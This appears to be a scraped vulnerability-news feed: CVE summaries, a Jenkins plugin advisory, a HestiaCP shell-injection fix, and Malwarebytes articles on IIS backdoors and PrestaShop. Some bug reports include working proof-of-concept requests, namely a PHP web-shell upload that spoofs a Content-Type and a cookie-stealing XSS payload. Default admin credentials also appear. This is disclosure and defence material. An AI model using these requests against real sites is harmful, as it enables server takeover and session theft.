An arbitrary file upload vulnerability in the Advertising Management module of Feehi CMS v2.1.1 allows attackers to execute arbitrary code via a crafted PHP file.

**Feehi CMS arbitrary code execution via crafted PHP file**

High severity GitHub Reviewed Published Jul 28, 2022 • Updated Aug 6, 2022

GHSA-jxg9-2ch7-f552: Feehi CMS arbitrary code execution via crafted PHP file

Barangay Management System v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the module editing function at /pages/activity/activity.php.

Permalink

Cannot retrieve contributors at this time

**Barangay Management System v1.0 by itsourcecode.com has arbitrary code execution (RCE)**

**BUG\_AUTHOR**: **whynot37**

The decompression password for the source file is itsourcecode.

Login account: admin/admin (Super Admin account)

Vulnerability url: ip/bmis/pages/activity/activity.php

vendors: https://itsourcecode.com/free-projects/php-project/barangay-management-system-project-in-php-with-source-code/

Loophole location: Background management system Activity module editing function-> "activity.php" file picture upload point exists arbitrary file upload vulnerability (RCE).

Click "Save" to save

Content-Type: image/png //Key points (Bypass detection by changing "Content Type" to "Content-Type: image/png")

Request package for file upload：

POST /bmis/pages/activity/activity.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/bmis/pages/activity/activity.php
Cookie: PHPSESSID=fbu82ocu8kd37b5b20uqq71a35; \_ga=GA1.1.1382961971.1655097107; \_gid=GA1.1.804632123.1655097107
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------231533211823565
Content-Length: 625
\-----------------------------231533211823565
Content-Disposition: form-data; name="txt\_doc"
1
\-----------------------------231533211823565
Content-Disposition: form-data; name="txt\_act"
1
\-----------------------------231533211823565
Content-Disposition: form-data; name="txt\_desc"
1
\-----------------------------231533211823565
Content-Disposition: form-data; name="files\[\]"; filename="shell.php"
Content-Type: image/png //Key points
JFJF
<?php phpinfo();?>
\-----------------------------231533211823565
Content-Disposition: form-data; name="btn\_add"
Add Activity
\-----------------------------231533211823565--

The files will be uploaded to this directory \\bmis\\pages\\activity\\photo  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-34120: bug_report/RCE-1.md at main · wangsj37/bug_report

Cuppa CMS v1.0 was discovered to contain a local file inclusion (LFI) vulnerability via the component /templates/default/html/windows/right.php.

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

**Local File Inclusion vulnerabilities in CuppaCMS templates****Vulnerability disclosed:  
**

*   CuppaCMS's latest github commit https://github.com/CuppaCMS/CuppaCMS/commit/4c9b742b23b924cf4c1f943f48b278e06a17e297 (dated Nov 12, 2019 ) and before (no version numbers) suffers from Local File Inclusion vulnerability, allowing access to system files. Script '/templates/default/html/windows/right.php' has parameter $\_POST\['url'\] that is not sanitised properly. This allows access to arbitrary files on the server.

**PoC:**

**Solution:  
**

*   TODO

Author: Mateo Hanžek

Reference: CuppaCMS/CuppaCMS#18

CVE-2022-34121: MyExploits/LFI_in_CuppaCMS_templates at main · hansmach1ne/MyExploits

Jenkins Repository Connector Plugin 2.2.0 and earlier does not perform a permission check in a method implementing form validation, allowing attackers with Overall/Read permission to check for the existence of an attacker-specified file path on the Jenkins controller file system.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 27 Jul 2022 15:48:59 +0200
From: Daniel Beck <ml@...kweb.net>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities in Jenkins plugins

Jenkins is an open source automation server which enables developers around
the world to reliably build, test, and deploy their software.

The following releases contain fixes for security vulnerabilities:

\* Compuware ISPW Operations Plugin 1.0.9
\* Compuware Source Code Download for Endevor, PDS, and ISPW Plugin 2.0.13
\* Compuware Topaz Utilities Plugin 1.0.9
\* Compuware Xpediter Code Coverage Plugin 1.0.8
\* Compuware zAdviser API Plugin 1.0.4
\* Deployer Framework Plugin 86.v7b\_a\_4a\_55b\_f3ec
\* External Monitor Job Type Plugin 192.ve979ca\_8b\_3ccd
\* Git client Plugin 3.11.1
\* Git Plugin 4.11.4
\* GitHub Plugin 1.34.5
\* HashiCorp Vault Plugin 355.v3b\_38d767a\_b\_a\_8
\* Job Configuration History Plugin 1156.v536a\_97b\_8d649
\* rhnpush-plugin Plugin 0.5.2
\* rpmsign-plugin Plugin 0.5.1

Additionally, we announce unresolved security issues in the following
plugins:

\* Android Signing Plugin
\* Buckminster Plugin
\* CLIF Performance Testing Plugin
\* Coverity Plugin
\* Dynamic Extended Choice Parameter Plugin
\* Files Found Trigger Plugin
\* Google Cloud Backup Plugin
\* HTTP Request Plugin
\* Lucene-Search Plugin
\* Maven Metadata Plugin for Jenkins CI server Plugin
\* OpenShift Deployer Plugin
\* Openstack Heat Plugin
\* Repository Connector Plugin

Summaries of the vulnerabilities are below. More details, severity, and
attribution can be found here:
https://www.jenkins.io/security/advisory/2022-07-27/

We provide advance notification for security updates on this mailing list:
https://groups.google.com/d/forum/jenkinsci-advisories

If you discover security vulnerabilities in Jenkins, please report them as
described here:
https://www.jenkins.io/security/#reporting-vulnerabilities

---

SECURITY-1468 / CVE-2022-36881
Git client Plugin 3.11.0 and earlier does not perform SSH host key
verification when connecting to Git repositories via SSH.

This lack of verification could be abused using a man-in-the-middle attack
to intercept these connections.


SECURITY-284 / CVE-2022-36882 (CSRF) & CVE-2022-36883 (permission check) &
CVE-2022-36884 (information disclosure)
Git Plugin provides a webhook endpoint at \`/git/notifyCommit\` that can be
used to notify Jenkins of changes to an SCM repository. For its most basic
functionality, this endpoint receives a repository URL, and Jenkins will
schedule polling for all jobs configured with the specified repository. In
Git Plugin 4.11.3 and earlier, this endpoint can be accessed with GET
requests and without authentication.

In addition to this basic functionality, the endpoint also accept a \`sha1\`
parameter specifying a commit ID. If this parameter is specified, jobs
configured with the specified repo will be triggered immediately, and the
build will check out the specified commit.

Additionally, the output of the webhook endpoint will provide information
about which jobs were triggered or scheduled for polling, including jobs
the user has no permission to access.

This allows attackers with knowledge of Git repository URLs to trigger
builds of jobs using a specified Git repository and to cause them to check
out an attacker-specified commit, and to obtain information about the
existence of jobs configured with this Git repository.

Additionally, this webhook endpoint does not require POST requests,
resulting in a cross-site request forgery (CSRF) vulnerability.


SECURITY-1849 / CVE-2022-36885
GitHub Plugin 1.34.4 and earlier does not use a constant-time comparison
when checking whether the provided and computed webhook signatures are
equal.

This could potentially allow attackers to use statistical methods to obtain
a valid webhook signature.


SECURITY-2762 / CVE-2022-36886
External Monitor Job Type Plugin 191.v363d0d1efdf8 and earlier does not
require POST requests for an HTTP endpoint, resulting in a cross-site
request forgery (CSRF) vulnerability.

This vulnerability allows attackers to create runs of an external job.


SECURITY-2766 / CVE-2022-36887
Job Configuration History Plugin 1155.v28a\_46a\_cc06a\_5 and earlier does not
require POST requests for several HTTP endpoints, resulting in cross-site
request forgery (CSRF) vulnerabilities.

These vulnerabilities allow attackers to delete entries from job, agent,
and system configuration history, or restore older versions of job, agent,
and system configurations.


SECURITY-2593 / CVE-2022-36888
HashiCorp Vault Plugin 354.vdb\_858fd6b\_f48 and earlier does not perform
permission checks in several HTTP endpoints performing Vault connection
tests.

This allows attackers with Overall/Read permission to obtain credentials
stored in Vault with attacker-specified path and keys.


SECURITY-2764 / CVE-2022-36889
Deployer Framework Plugin 85.v1d1888e8c021 and earlier does not restrict
the application path of the applications when configuring a deployment.

This allows attackers with Item/Configure permission to upload arbitrary
files from the Jenkins controller file system to the selected service.


SECURITY-2206 / CVE-2022-36890
Deployer Framework Plugin 85.v1d1888e8c021 and earlier does not restrict
the name of files in methods implementing form validation.

This allows attackers with Item/Read permission to check for the existence
of an attacker-specified file path on the Jenkins controller file system.


SECURITY-2205 / CVE-2022-36891
Deployer Framework Plugin 85.v1d1888e8c021 and earlier does not perform a
permission check in an HTTP endpoint.

This allows attackers with Item/Read permission to read deployment logs.


SECURITY-2402 / CVE-2022-36892
rhnpush-plugin Plugin 0.5.1 and earlier does not perform a permission check
in a method implementing form validation.

This allows attackers with Item/Read permission but without Item/Workspace
or Item/Configure permission to check whether attacker-specified file
patterns match workspace contents. A sequence of requests can be used to
effectively list workspace contents.


SECURITY-2403 / CVE-2022-36893
rpmsign-plugin Plugin 0.5.0 and earlier does not perform a permission check
in a method implementing form validation.

This allows attackers with Item/Read permission but without Item/Workspace
or Item/Configure permission to check whether attacker-specified file
patterns match workspace contents. A sequence of requests can be used to
effectively list workspace contents.


SECURITY-2413 / CVE-2022-36894
CLIF Performance Testing Plugin 64.vc0d66de1dfb\_f and earlier allows users
to extract files from an archive without validating file paths of files
contained within the archive.

This allows attackers with Overall/Read permission to create or replace
arbitrary files on the Jenkins controller file system with
attacker-specified content.

As of publication of this advisory, there is no fix.


SECURITY-2619 / CVE-2022-36895
Compuware Topaz Utilities Plugin 1.0.8 and earlier does not perform
permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate hosts and
ports of Compuware configurations and credentials IDs of credentials stored
in Jenkins. Those credentials IDs can be used as part of an attack to
capture the credentials using another vulnerability.


SECURITY-2621 / CVE-2022-36896
Compuware Source Code Download for Endevor, PDS, and ISPW Plugin 2.0.12 and
earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate hosts and
ports of Compuware configurations and credentials IDs of credentials stored
in Jenkins. Those credentials IDs can be used as part of an attack to
capture the credentials using another vulnerability.


SECURITY-2626 / CVE-2022-36897
Compuware Xpediter Code Coverage Plugin 1.0.7 and earlier does not perform
permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate hosts and
ports of Compuware configurations and credentials IDs of credentials stored
in Jenkins. Those credentials IDs can be used as part of an attack to
capture the credentials using another vulnerability.


SECURITY-2628 / CVE-2022-36898
Compuware ISPW Operations Plugin 1.0.8 and earlier does not perform
permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate hosts and
ports of Compuware configurations and credentials IDs of credentials stored
in Jenkins. Those credentials IDs can be used as part of an attack to
capture the credentials using another vulnerability.


SECURITY-2629 / CVE-2022-36899
Compuware ISPW Operations Plugin defines a controller/agent message that
retrieves Java system properties.

Compuware ISPW Operations Plugin 1.0.8 and earlier does not restrict
execution of the controller/agent message to agents. This allows attackers
able to control agent processes to retrieve Java system properties.

NOTE: This vulnerability is only exploitable in Jenkins 2.318 and earlier,
LTS 2.303.2 and earlier.


SECURITY-2630 / CVE-2022-36900
Compuware zAdviser API Plugin defines a controller/agent message that
retrieves Java system properties.

Compuware zAdviser API Plugin 1.0.3 and earlier does not restrict execution
of the controller/agent message to agents. This allows attackers able to
control agent processes to retrieve Java system properties.

NOTE: This vulnerability is only exploitable in Jenkins 2.318 and earlier,
LTS 2.303.2 and earlier.


SECURITY-2053 / CVE-2022-36901
HTTP Request Plugin 1.15 and earlier stores HTTP Request passwords
unencrypted in its global configuration file
\`jenkins.plugins.http\_request.HttpRequest.xml\` on the Jenkins controller as
part of its configuration when using (deprecated) Basic/Digest
Authentication.

These passwords can be viewed by users with access to the Jenkins
controller file system.

As of publication of this advisory, there is no fix.


SECURITY-2682 / CVE-2022-36902
Dynamic Extended Choice Parameter Plugin 1.0.1 and earlier does not escape
several fields of Moded Extended Choice parameters.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers with Item/Configure permission.

As of publication of this advisory, there is no fix.


SECURITY-2665 (1) / CVE-2022-36903
Repository Connector Plugin 2.2.0 and earlier does not perform permission
checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate credentials
IDs of credentials stored in Jenkins. Those can be used as part of an
attack to capture the credentials using another vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2665 (2) / CVE-2022-36904
Repository Connector Plugin 2.2.0 and earlier does not perform a permission
check in a method implementing form validation.

This allows attackers with Overall/Read permission to check for the
existence of an attacker-specified file path on the Jenkins controller file
system. A sequence of requests can be used to effectively list the Jenkins
controller file system.

As of publication of this advisory, there is no fix.


SECURITY-2686 / CVE-2022-36905
Maven Metadata Plugin for Jenkins CI server Plugin 2.2 and earlier does not
perform URL validation for the Repository Base URL of List maven artifact
versions parameters.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers with Item/Configure permission.

As of publication of this advisory, there is no fix.


SECURITY-1375 (1) / CVE-2022-36906 (CSRF) & CVE-2022-36907 (missing permission check)
OpenShift Deployer Plugin 1.2.0 and earlier does not perform a permission
check in a method implementing form validation.

This allows attackers with Overall/Read permission to connect to an
attacker-specified URL using attacker-specified username and password.

Additionally, this form validation method does not require POST requests,
resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-1375 (2) / CVE-2022-36908 (CSRF) & CVE-2022-36909 (missing permission check)
OpenShift Deployer Plugin 1.2.0 and earlier does not perform permission
checks in methods implementing form validation.

This allows attackers with Overall/Read permission to check for the
existence of an attacker-specified file path on the Jenkins controller file
system and to upload a SSH key file from the Jenkins controller file system
to an attacker-specified URL.

Additionally, these form validation methods do not require POST requests,
resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2048 / CVE-2022-36910
Lucene-Search Plugin 370.v62a5f618cd3a and earlier does not perform
permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to reindex the database
and to obtain information about jobs otherwise inaccessible to them.

As of publication of this advisory, there is no fix.


SECURITY-2105 (1) / CVE-2022-36911 (CSRF) & CVE-2022-36912 (missing permission check)
Openstack Heat Plugin 1.5 and earlier does not perform permission checks in
methods implementing form validation.

This allows attackers with Overall/Read permission to connect to an
attacker-specified URL.

Additionally, these form validation methods do not require POST requests,
resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2105 (2) / CVE-2022-36913
Openstack Heat Plugin 1.5 and earlier does not perform permission checks in
methods implementing form validation.

This allows attackers with Overall/Read permission to check for the
existence of an attacker-specified file path on the Jenkins controller file
system. A sequence of requests can be used to effectively list the Jenkins
controller file system.

As of publication of this advisory, there is no fix.


SECURITY-2210 / CVE-2022-36914
Files Found Trigger Plugin 1.5 and earlier does not perform a permission
check in a method implementing form validation.

This allows attackers with Overall/Read permission to check for the
existence of an attacker-specified file path on the Jenkins controller file
system. A sequence of requests can be used to effectively list the Jenkins
controller file system.

As of publication of this advisory, there is no fix.


SECURITY-2404 / CVE-2022-36915
Android Signing Plugin 2.2.5 and earlier does not perform a permission
check in a method implementing form validation.

This allows attackers with Item/Read permission but without Item/Workspace
or Item/Configure permission to check whether attacker-specified file
patterns match workspace contents. A sequence of requests can be used to
effectively list workspace contents.

As of publication of this advisory, there is no fix.


SECURITY-2656 / CVE-2022-36916 (CSRF) & CVE-2022-36917 (missing permission check)
Google Cloud Backup Plugin 0.6 and earlier does not perform a permission
check in an HTTP endpoint.

This allows attackers with Overall/Read permission to request a manual
backup.

Additionally, this HTTP endpoint does not require POST requests, resulting
in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2747 / CVE-2022-36918
Buckminster Plugin 1.1.1 and earlier does not perform a permission check in
a method implementing form validation.

This allows attackers with Overall/Read permission to check for the
existence of an attacker-specified file path on the Jenkins controller file
system. A sequence of requests can be used to effectively list the Jenkins
controller file system.

As of publication of this advisory, there is no fix.


SECURITY-2790 (1) / CVE-2022-36919
Coverity Plugin 1.11.4 and earlier does not perform a permission check in
an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials
IDs of credentials stored in Jenkins. Those can be used as part of an
attack to capture the credentials using another vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2790 (2) / CVE-2022-36920 (CSRF) & CVE-2022-36921 (permission check)
Coverity Plugin 1.11.4 and earlier does not perform a permission check in
an HTTP endpoint.

This allows attackers with Overall/Read permission to connect to an
attacker-specified URL using attacker-specified credentials IDs obtained
through another method, capturing credentials stored in Jenkins.

Additionally, this HTTP endpoint does not require POST requests, resulting
in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2812 / CVE-2022-36922
Lucene-Search Plugin 370.v62a5f618cd3a and earlier does not escape the
search \`query\` parameter displayed on the search result page.

This results in a reflected cross-site scripting (XSS) vulnerability.

As of publication of this advisory, there is no fix.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-36904: security - Multiple vulnerabilities in Jenkins plugins

OS Command Injection in GitHub repository hestiacp/hestiacp prior to 1.6.5.

@@ -80,21 +80,28 @@ public function install(array $options = null, &$status=null)

  

$installUrl = $webDomain . "install.php";

  

$cmd = "curl --request POST "

. ($sslEnabled ? "" : "\--insecure " )

. "\--url $installUrl "

. "\--header 'Content-Type: application/x-www-form-urlencoded' "

. "\--data l=en "

. "\--data 'd\[title\]=" . $options\['wiki\_name'\] . "' "

. "\--data 'd\[acl\]=on' "

. "\--data 'd\[superuser\]=" . $options\['superuser'\] . "' "

. "\--data 'd\[fullname\]=" . $options\['real\_name'\] . "' "

. "\--data 'd\[email\]=" . $options\['email'\] . "' "

. "\--data 'd\[password\]=" . $options\['password'\] . "' "

. "\--data 'd\[confirm\]=" . $options\['password'\] . "' "

. "\--data 'd\[policy\]=" . substr($options\['initial\_ACL\_policy'\], 0, 1) . "' "

. "\--data 'd\[license\]=" . explode(":", $options\['content\_license'\])\[0\] . "' "

. "\--data submit=";

$cmd = implode(" ", array(

"curl",

"\--request POST",

($sslEnabled ? "" : "\--insecure "),

"\--url " . escapeshellarg($installUrl),

"\--header 'Content-Type: application/x-www-form-urlencoded'",

'--data-binary ' . escapeshellarg(http\_build\_query(array(

"l" => "en",

"d" => array(

"title" => $options\['wiki\_name'\],

'acl' => 'on',

'superuser' => $options\['superuser'\],

'fullname' => $options\['real\_name'\],

'email' => $options\['email'\],

'password' => $options\['password'\],

'confirm' => $options\['password'\],

'policy' => substr($options\['initial\_ACL\_policy'\], 0, 1),

'license' => explode(":", $options\['content\_license'\])\[0\]

),

'submit' => ''

)))

));

  

exec($cmd, $output, $return\_var);

if($return\_var > 0){

CVE-2022-2550: fix DokuWiki shell issue · hestiacp/hestiacp@3d4c309

Sims v1.0 was discovered to contain an arbitrary file upload vulnerability via the component /uploadServlet. This vulnerability allows attackers to escalate privileges and execute arbitrary commands via a crafted file.

CVE-2022-34549: CWE-434: Unrestricted Upload of File with Dangerous Type (4.8)

The Microsoft 365 Defender Research Team has warned that attackers are increasingly leveraging Internet Information Services (IIS) extensions as covert backdoors into servers.
The post IIS extensions are on the rise as backdoors to servers appeared first on Malwarebytes Labs.

The Microsoft 365 Defender Research Team has warned that attackers are increasingly leveraging Internet Information Services (IIS) extensions as covert backdoors into servers.

IIS extensions are able to stay hidden in target environments and as such provide a long-term persistence mechanism for attackers.

**IIS**

IIS is webserver software created by Microsoft that runs on Windows systems. Most commonly, organizations use IIS to host ASP.NET web applications and static websites. It can also be used as an FTP server, host WCF services, and be extended to host web applications built on other platforms such as PHP.

Exchange Server 2016 and Exchange Server 2019 automatically configure multiple Internet Information Services (IIS) virtual directories during the server installation. As a result, administrators are not always aware of the origin of some directories and their functionality.

**IIS modules**

The IIS 7 and above web server feature set is componentized into more than thirty independent modules. A module is either a Win32 DLL (native module) or a .NET 2.0 type contained within an assembly (managed module). Similar to a set of building blocks, modules are added to the server in order to provide the desired functionality for applications.

Malicious IIS modules are near perfect backdoors. Once installed, they will respond to specifically crafted HTTP requests sent by the operator instructing the server to collect emails, add further malicious access, or use the compromised servers for clandestine purposes. These requests will seem normal to the unsuspicious eye.

**IIS backdoors**

IIS backdoors are harder to detect since they mostly reside in the same directories as legitimate modules, and they follow the same code structure as clean modules. The actual backdoor code is hard to detect as such and that also makes it hard to determine the origin.

**ProxyLogon and ProxyShell**

Some of the methods used to drop malicious IIS extensions are known as ProxyLogon and ProxyShell. ProxyLogon consists of four vulnerabilities which can be combined to form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, the attackers deploy web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.

The ProxyShell exploit is very similar to ProxyLogon and was discovered more recently. ProxyShell is a different attack chain designed to exploit three separate vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207.

**Malicious behavior**

On its blog, the Microsoft Team describes a custom IIS backdoor called FinanceSvcModel.dll which has a built-in capability to perform Exchange management operations, such as enumerating installed mailbox accounts and exporting mailboxes for exfiltration. What’s interesting in this example is how the threat actor forced the system to use the WDigest protocol for authentication, resulting in lsass.exe retaining a copy of the user’s plaintext password in memory. This allowed the threat actor to steal the actual passwords and not just the hashes.

Credential stealing can be a goal by itself. But stolen credentials also allow the attackers to remain persistent in the environment, even if the primary backdoor is detected. Credential stealing modules monitor for specific requests to determine a sign-in activity and dump the provided credentials in a file the threat actor can retrieve later.

Given the rising energy prizes and the falling, yet still profitable, cryptocurrency exchange rates, we wouldn’t be surprised to find servers abused for cryptomining. A few years ago we saw threat actors leveraging an IIS 6.0 vulnerability to take over Windows servers and install a malware strain that mined the Electroneum cryptocurrency.

**Mitigation, detection, and remediation**

There are several thing you can do to minimize the risk and consequences of a malicious IIS extension:

*   Keep your server software up to date to minimize the risk of infection.
*   Use security software that also covers your servers.
*   Regularly check loaded IIS modules on exposed IIS servers (notably Exchange servers), leveraging existing tools from the IIS servers suite.
*   Deploy a backup strategy that creates regular backups that are easy to deploy when needed.
*   Review permission and access policies, combined with credential hygiene.
*   Prioritize alerts that show patterns of server compromise. It can help to catch attacks in the exploratory phase, the period in which attackers spend time exploring the environment after gaining initial access.

Stay safe, everyone!

IIS extensions are on the rise as backdoors to servers

We take a look at a security advisory from PrestaShop which warns of compromised stores and redirected payment data.
The post PrestaShop warns of vulnerability: Update your stores now! appeared first on Malwarebytes Labs.

A vulnerability affecting open source e-commerce platform PrestaShop could spell trouble for servers running PrestaShop websites. The 15-year-old organisation’s platform is currently used by around 300,000 shops worldwide. The exploit is very dependent on specific versions in use, so one PrestaShop customer may see different results to another.

**What’s happening?**

The exploit has its own CVE, known as CVE-2022-36408, and (from PrestaShop’s security advisory) relates to a “previously unknown vulnerability chain that we are fixing“. PrestaShop goes on to say that:

> _…this issue seems to concern shops based on versions 1.6.0.10 or greater, subject to SQL injection vulnerabilities. Versions 1.7.8.2 and greater are not vulnerable unless they are running a module or custom code which itself includes an SQL injection vulnerability. Note that versions 2.0.0~2.1.0 of the Wishlist (blockwishlist) module are vulnerable._

If the shop is vulnerable to SQL injection exploits, then based on available information so far it’s almost certainly running old, outdated modules. There’s a possibility that vulnerable third-party modules may also be responsible. Assuming everything is in place for the attack to happen, it plays out like this:

1.  The attacker submits a POST request to the endpoint vulnerable to SQL injection.
2.  After approximately one second, the attacker submits a GET request to the homepage, with no parameters. This results in a PHP file called blm.php being created at the root of the shop’s directory.
3.  The attacker now submits a GET request to the new file that was created, blm.php, allowing them to execute arbitrary instructions.

Once control is gained of the shop, a fake payment form is injected into the checkout page. At this point, shop customers submitting payment data will be sending their details to the attacker and not the genuine store owner. PrestaShop notes that this may not be the only tactic at play—it’s possible different file names, software modification, or even malicious code may be worked into the mix. The current level of uncertainty as to exact method used, or if third-party aspects are involved, is to the attacker’s advantage.

**How to defend against this vulnerability**

PrestaShop advises to ensure both shop and modules are running their latest versions. Users should also disable a rarely used feature called MySQL Smarty. This is disabled by default, but can be activated remotely by an attacker. The advise here is to physically disable it like so:

> _Locate the file config/smarty.config.inc.php on your PrestaShop install, and remove lines 43-46 (PrestaShop 1.7) or 40-43 (PrestaShop 1.6)._

At the time of writing, PrestaShop suggests shop owners “contact a specialist” to perform a full audit of the site and ensure nothing has been modified or had malicious code added. Finally, shop owners are advised to download the latest release, PrestaShop 1.7.8.7 which addresses the vulnerability.

A note of caution: there’s uncertainty over whether this addresses all versions of the attack. Additionally, if your store has already been hacked then this update may not be enough to fix the lurking problem. The best remedy here is to get your update in early and try to beat the attackers to the punch.

PrestaShop warns of vulnerability: Update your stores now!

Advanced School Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component ip/school/moudel/update_subject.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Edit Subject text field.

**Advanced School Management System v1.0 by itsourcecode.com has Cross-site Scripting (XSS)**

**Vul\_Author: Liyuan Ji**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendor: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability url: ip/school/view/subject.php

Vulnerability location: ip/school/moudel/update\_subject.php

\[+\] Payload: <script>alert(document.cookie)</script>

Tested on Windows 10, phpStudy

There is an exemple with alert:

    GET /school/model/update_subject.php?id=15&nama=%3Cscript%3Ealert(documant.cookie)%3C/script%3E$do=update_subject HTTP/1.1
    Host: 192.168.1.19
    User-Agent: Mozilla/5.0(X11;Linux x86_64; rw:91.0) Gecko/20100101Firefox/91.0
    Accept: */*
    Accept-Language: en-Us,en;q-0.5
    Accept-Encoding: gzip,deflate
    Connection: close
    Referer: http://192.168.1.19/school/view/subject.php
    Cookie: PHPSESSID=5nicpveormjn86h3bf398fsem3
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    

We click the subject interface and edit it.

XSS script that writes the burst cookie.

After we update, click subject again.

We have obtained the cookie.

It can be seen from the source code that it is an XSS attack using SQL injection vulnerability.

CVE-2022-34594: bug_report/XSS-1.md at master · gitgeniuss/bug_report

A cross-site scripting (XSS) vulnerability in /index.php/?p=report of Online Fire Reporting System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the "Contac #" text field.

**Online Fire Reporting System v1.0 has XSS injection vulnerability**

Login account: admin/admin123

vendor : https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html

Vulnerability file: /ofrs/report.php

Vulnerability location: /index.php/?p=report

\[+\]Payload:

When the report sent by the user is mixed with malicious code, as follows

At this time, when the administrator checks the daily report, he will receive XSS attack

Tag

#php